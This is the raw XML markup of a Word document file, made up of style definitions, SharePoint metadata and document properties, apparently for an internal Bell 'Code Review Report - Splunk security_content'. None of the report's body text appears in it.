  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="00C01949"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Times New Roman (Titres CS)"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00C01949"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman (Corps CS)"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:rsid w:val="00C01949"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Times New Roman (Corps CS)"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00217577"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00217577"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="0034020C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0034020C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="0034020C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0034020C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F56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025011">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="4524071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icktang/Library/Containers/com.microsoft.Outlook/Data/tmp/Outlook%20Temp/Bell%20Word%20template_V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53B4EBCCC08134B8010AA22074E869A" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="77e42384c7cfa0e46b77cf33c322f6ea">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="bda38764-73fe-4aa7-94d1-653e61076ba6" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="8997619b4b68bd247868e53b45c211b7" ns2:_="">
    <xsd:import namespace="bda38764-73fe-4aa7-94d1-653e61076ba6"/>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a38764-73fe-4aa7-94d1-653e61076ba6"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Conserver l’ID" ma:description="Conserver l’ID lors de l’ajout."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lc_DocId xmlns="bda38764-73fe-4aa7-94d1-653e61076ba6">eSpW81297500-1-33914</_dlc_DocId>
    <_dlc_DocIdUrl xmlns="bda38764-73fe-4aa7-94d1-653e61076ba6">
      <Url>https://espace.int.bell.ca/workspaces/Brand/_layouts/15/DocIdRedir.aspx?ID=eSpW81297500-1-33914</Url>
      <Description>eSpW81297500-1-33914</Description>
    </_dlc_DocIdUrl>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01A568-B9A8-4B70-8252-B1737D1116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a38764-73fe-4aa7-94d1-653e61076b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FC07597-8C81-4091-A047-467989872B45}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/events"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{65150A07-9DE0-44F7-9A49-36D871EED76E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3B42FBC7-B46B-4DFA-8202-DC336E5C1F67}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="bda38764-73fe-4aa7-94d1-653e61076ba6"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps5.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8763CFCE-528E-7541-AA6F-173AE99E9D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Bell Word template_V1.dotx</Template>
  <TotalTime>1</TotalTime>
  <Pages>1</Pages>
  <Words>0</Words>
  <Characters>0</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>0</Lines>
  <Paragraphs>0</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Word Document</vt:lpstr>
      <vt:lpstr>Bell at MISA 08</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>XEROX CORPORATION</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Code Review Report - Splunk security_content</dc:title>
  <dc:subject>Security assessment</dc:subject>
  <dc:creator>Bell Cyber STIRT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rijo M. Roy</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2013-10-23T18:37:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-02T15:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-02T15:37:00Z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0x010100C53B4EBCCC08134B8010AA22074E869A</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>b71a9771-bf0a-4ce9-932f-fd2c5edbf5ac</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_033d35ff-cd36-4205-a2e1-96e65e1a4f1d_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_033d35ff-cd36-4205-a2e1-96e65e1a4f1d_SetDate">
    <vt:lpwstr>2025-09-27T03:46:18Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_033d35ff-cd36-4205-a2e1-96e65e1a4f1d_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_033d35ff-cd36-4205-a2e1-96e65e1a4f1d_Name">
    <vt:lpwstr>Internal Emails</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_033d35ff-cd36-4205-a2e1-96e65e1a4f1d_SiteId">
    <vt:lpwstr>3667b291-6769-45dd-9bb8-eb7dd48b3328</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_033d35ff-cd36-4205-a2e1-96e65e1a4f1d_ActionId">
    <vt:lpwstr>f40cef48-bde0-4982-9a8c-64f852aac77a</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_033d35ff-cd36-4205-a2e1-96e65e1a4f1d_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>